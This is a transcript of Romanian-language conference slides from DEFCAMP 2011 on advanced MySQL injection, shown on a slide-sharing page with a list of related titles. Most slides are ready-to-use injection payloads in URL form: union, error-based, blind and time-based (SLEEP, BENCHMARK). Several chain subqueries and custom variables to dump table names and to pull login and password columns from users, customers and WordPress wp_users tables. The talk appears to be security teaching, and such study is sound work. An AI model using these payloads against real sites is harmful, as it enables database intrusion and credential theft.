Upload File

advanced data mining in my sql injections using subqueries and custom variables

  • Home
  • Technology
  • Advanced data mining in my sql injections using subqueries and custom variables
20
“Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables” DEFCAMP – 2011

Upload: defcamp

Post on 25-Dec-2014

7.433 views

Category:

Technology


0 download

Report

DESCRIPTION

 

TRANSCRIPT

Page 1: Advanced data mining in my sql injections using subqueries and custom variables

“Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”

DEFCAMP – 2011

Page 2: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

- CUPRINS - [ * ] Notiuni introductive: SQL , Injectii SQL

[ * ] Variabile Particularizate si Sub-Interogari in MySQL

[ * ] Optimizarea tehnicilor clasice de extragere a informatiilor : - variabile MySQL ( Server System Variables / Session Variables ) - bazele de date disponibile ( schema_name / SCHEMATA ) - tabelele si coloanele aferente acestora ( table_name / column_name )

- privilegii ( USER_PRIVILEGES : GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE )

- citirea & scrierea fisierelor ( LOAD_FILE / INTO DUMPFILE - OUTFILE)

- atacuri Denial of Service ( DOS )

Page 3: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Structured Query Language (SQL - limbajul structurat de interogare) este limbajul standard folosit pentru manipularea si regasirea datelor din baze de date relationale. Prin SQL, un programator sau un administrator de baze de date poate face urmatoarele lucruri:

* sa modifice structura unei baze de date ; * sa schimbe valorile de configurare pentru securitatea sistemului; * sa adauge drepturi utilizatorilor asupra bazelor de date sau tabelelor; * sa interogheze o baza de date asupra unor informatii; * sa actualizeze continutul unei baze de date.

Page 4: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Cum functioneaza PHP + MySQL ?

< request-ul efectuat de catre client

< procesarea request-ului la nivel de server

< raspunsul trimis catre client ca rezultat al cererii

Page 5: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

What could possibly go wrong ?

!!!!!!

Page 6: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

SQL Injections ( Injectii SQL ) – tehnica de malformare a sintaxei SQL datorata modificarii valorilor parametrilor $_GET, $_POST, cookies, headers, ce sunt preluate si prelucrate de fisierele server-side fara a filtra in prealabil caractere sau comenzi ce pot fi periculoase.

Page 7: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Exemplu de injectie MySQL clasica.

Page 8: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--

Tipuri de injectii SQL : UNION BASED

index.php?id=1’ and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 --

index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1

index.php? id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2

index.php?id=1+and+1=0+union+select+ sql_no_cache+1,2,3,4,5

Page 9: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Tipuri de injectii SQL : UNION BASED

Page 10: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Tipuri de injectii SQL : ERROR BASED

index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+

Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+

news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- +

details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--

?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--

Page 11: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Tipuri de injectii SQL : ERROR BASED

Page 12: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Tipuri de injectii SQL : BLINDindex.php?id=1’ and substring(@@version,1,1)=4--index.php?id=1’ and substring(@@version,1,1)=5--

index.php?id=1 and (SELECT 1 from admin limit 0,1)=1

news.php?id = -1 'OR id = IF(ASCII(SUBSTRING (SELECT USER ()), 1, 1 )))>= 100, 1, SLEEP (3))

index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1 )))>1index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103

script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) –

script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --

Page 13: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Tipuri de injectii SQL : BLIND

Page 14: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

MySQL Custom Variables (Variabile Particularizate)

Page 15: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

MySQL Sub-Queries (Sub-Interogari)

SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);

Page 16: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Injectii MySQL - folosind Custom Variables :CLASIC SYNTAX : index.php?id=2’+and+1=0+union+select+1,2,3,4,5--

NEW SYNTAX: index.php?id=2’+and+1=0+union+select+@i:=version(),@i,@i,@i,@i--

@i:=concat( version(),0x3a,database() )

@i:=cast(version()+as+binary)

@i:=convert(version(),binary)

@i:=convert(version()+using+latin1)

@i:=aes_decrypt(aes_encrypt(version(),1),1)

@x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)

Page 17: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Injectii MySQL - folosind SubQueries :

index.php?id = -1+union+select+*+from+users,(select+1,2,3,4,5,6)a--

id=3 AND (SELECT 7574 FROM(SELECT COUNT(*) ,CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)), CHAR(58,101,118,118,58), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select 1,2,3,4,5)--+--X

Page 18: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Injectii MySQL - folosind SubQueries + Custom Variables :

index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00) , (select (null) from (information_schema.columns) where (table_schema!=‘information_schema’) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4--

index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),o),4

index.php?id=-7’ union (select * from (select @i:=version())q join (select @i)w join (select @i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx

Page 19: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

Injectii MySQL - folosind SubQueries + Custom Variables :

index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--

Page 20: Advanced data mining in my sql injections using subqueries and custom variables

………


Advanced Subqueries in PROC SQL - Systems Seminar Consultants!

Introduction to SQL - bekirdizdaroglu.com · Introduction to SQL Select-From-Where StatementsWhere Statements Multirelation Queries Subqueries 1

SQL - Subqueries and Schema Chapter 3.4 V3.0 Copyright @ Napier University Dr Gordon Russell

Advanced SQL Subqueries - Presentation

SQL Queries and Subqueries Zaki Malik September 04, 2008

Sql injections (Basic bypass authentication)

SQL/Lesson 4/Slide 1 of 45 Using Subqueries and Managing Databases Objectives In this lesson, you will learn to: *Use subqueries * Use subqueries with

SQL Unit 9 Correlated Subqueries

SQL - Subqueries and Schema · 2011. 7. 22. · Subqueries • Subquery – one SELECT statement inside another • Used in the WHERE clause • Subqueries can return many rows. •

Sql Injections With Real Life Scenarious

20628302 SQL Injections

Execution Strategies for SQL Subqueries

SQL - Subqueries and Schemadb.grussell.org/slides/sql4.pdf · Subqueries • Subquery – one select statement inside another • Used in the WHERE clause • Subqueries can return

SQL Queries and Subqueries - Undergraduate Coursescourses.cs.vt.edu/~cs4604/Fall08/lectures/lecture04.pdf · SQL Queries and Subqueries Zaki Malik September 04, 2008. Basic SQL Query

SUBQUERIES IN SQL - web.cecs.pdx.eduweb.cecs.pdx.edu/~lmd/cs386/subqueries-in-sql.pdf · SUBQUERIES IN SQL Week 4 January 30, 2013 CS 386/586 Winter 2013 Lois Delcambre CS386/586

Percona SQL Injections

Database Programming Sections 6 –Subqueries, Single Row Subqueries, Multiple-column subqueries, Multiple-row Subqueries, Correlated Subqueries

Introduction to SQL Introduction Select-From-Where Statements Queries over Several Relations Subqueries

SQL Injections (Part 1)

SQL Injections and Behind

SQL (4): Subqueries

Review of SQL Group Functions and Subqueries

Oracle11g: SQL Chapter 12 Subqueries and Merge Statements

SQL Injections - 2016 - Huntington Beach

Menos Buffer Overflows, más SQL Injections

1 Introduction to SQL Select-From-Where Statements Subqueries Grouping and Aggregation

Oracle 10g SQL Programming - dell.com · SQL Subqueries Times, Dates, and Strings Temporary Tables SQL Tuning Tools oracle Analytic Functions Data Warehouse Features SQL Tuning Formatting

SQL Subqueries Objectives of the Lecture : To consider the general nature of subqueries. To consider simple versus correlated subqueries. To consider the

SQL Unit 8 Subqueries with IN, Joins, and Other Topics

SQL Lecture 3 SQL Lecture 3. 2 SQL SQL Data Definition Basic Query Structure Set Operations Aggregate Functions Null Values Nested Subqueries Complex

Chapter 13 Subqueries and Views Part C. SQL Copyright 2005 Radian Publishing Co

SQL Subqueries Management Databaseptw/teaching/DBM/sql-subqueries.pdfduplicate answers. Database Management Peter Wood SQL queries SQL Subqueries Aggregation Queries Intersection of

SQL Unit 9 Correlated Subqueries Kirk Scott 1. 2

SQL injections

SQL Subqueries - Undergraduate Courses | Computer …courses.cs.vt.edu/~cs4604/Fall10/lectures/lecture-04-sq… ·  · 2010-09-02SQL Subqueries T. M. Murali September 1, 2010 T